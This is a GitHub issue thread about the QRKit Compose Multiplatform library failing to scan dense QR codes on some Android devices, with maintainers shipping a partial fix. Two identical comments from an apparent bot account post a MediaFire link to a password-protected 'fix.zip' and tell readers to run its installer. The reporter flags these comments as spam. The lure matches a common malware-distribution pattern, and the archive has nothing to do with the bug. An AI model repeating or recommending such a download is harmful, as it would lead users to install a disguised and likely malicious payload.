### ISSUE TITLE
Does not work well with dense QRs

### ISSUE THREAD

**Issue by jishinhv** [Chaintech-Network/QRKitComposeMultiplatform#11]
No luck scanning dense QR codes that had a lot of data in them. They work on the system QR scanners on the respective devices - android and iOS but not through QRKit. 

- Is this a known issue?
- Any way to toggle if its hidden under any config?
- Are we planning to support it/ is already in works?

Some times works on a few devices but seen to be not working on a Samsung Galaxy S23 consistently.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jishinhv** [comment]
@ctn-mobile-innovation can you report the above two comments and remove them please? Looks like a bot on a mission.

**Comment by ctn-mobile-innovation** [comment]
@jishinhv Can you share such QR with us? so that we can check and fix

**Comment by jishinhv** [comment]
The data within the QRs we tested with have sensitive information so we may not be able to share them but I believe this should be replicable with any dummy large data and generate QR with @ctn-mobile-innovation.

**Comment by ctn-mobile-innovation** [comment]
@jishinhv we will explore this and will try to provide fix in upcoming version!

**Comment by ctn-mobile-innovation** [comment]
@jishinhv Please check this in latest version!

**Comment by ctn-mobile-innovation** [comment]
As no reply on this, we belive this has been fixed so closing this issue. @jishinhv

**Comment by jishinhv** [comment]
Hey @ctn-mobile-innovation , haven't gotten a chance to try the new version out yet. Will reopen if its not resolved. Thanks for the fix, appreciate the efforts you folks are putting in. 👏

**Comment by jishinhv** [comment]
Hey @ctn-mobile-innovation We could not upgrade to the latest 3.0.3 version as it depends on Kotlin 2.0+ and we're currently on 1.9.23. Using 2.0.0 for now. Will confirm if the fixes worked whenever we get to move to 3.0.3.

**Comment by jishinhv** [comment]
Hi @ctn-mobile-innovation, we tried this out. It works with dense QRs on some devices. Tried on Redmi 11T pro 5G, iQOO neo 9 pro, Google pixel 6a, 8a, 7pro, 9proXL where it works. But dense QRs are not getting scanned on a Moto edge 50 even after moving around, zooming in, increasing the screen brightness etc. 

Are there any device level restrictions on the lib thats preventing it from being able to scan the dense QRs?
